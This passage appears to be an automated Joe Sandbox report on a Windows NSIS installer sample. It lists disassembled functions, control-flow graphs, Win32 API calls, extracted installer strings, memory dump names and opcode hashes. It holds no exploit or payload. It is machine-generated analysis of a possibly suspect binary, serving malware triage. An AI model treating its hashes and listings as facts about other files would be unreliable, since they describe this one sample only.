                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                                                                            • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                                                                            • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                                                                            • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                                                                            • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                                                                            • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                                                                            • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                                                                            • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                                                                            • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                                                                            • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                                                                            • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                                                                            • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                                                                            • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                                                                            • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                                                                            • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                                                                            • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                                                                            • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                                                                            • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                                                                            • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                                                                            • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                                                            • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                                                                                                                                                                                                                                                                            Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                                                                            • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                                                            • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                                                                                                                                                                                                                                                                                            Function 00405958 Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(: Completed), ref: 00405A7A
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                                                                            • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                                                                            • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                                                                            • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$: Completed$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                                                                            • API String ID: 608394941-4268185132
                                                                                                                                                                                                                                                                                                                            • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                                                                                                                                                                                                                                                                            Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,ReturningPreferencesWrightWhy,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,ReturningPreferencesWrightWhy,ReturningPreferencesWrightWhy,00000000,00000000,ReturningPreferencesWrightWhy,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425D19,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425D19,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425D19,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$ReturningPreferencesWrightWhy
                                                                                                                                                                                                                                                                                                                            • API String ID: 4286501637-2978164705
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 64a557673ae3d0e019bdca1bc4e77ebfe7370d638d91dc23aa74aa5952768e1c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64a557673ae3d0e019bdca1bc4e77ebfe7370d638d91dc23aa74aa5952768e1c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                                                                                                                                                                                                                                                                            Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                                                                            • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                                                                            • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                                                                            • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
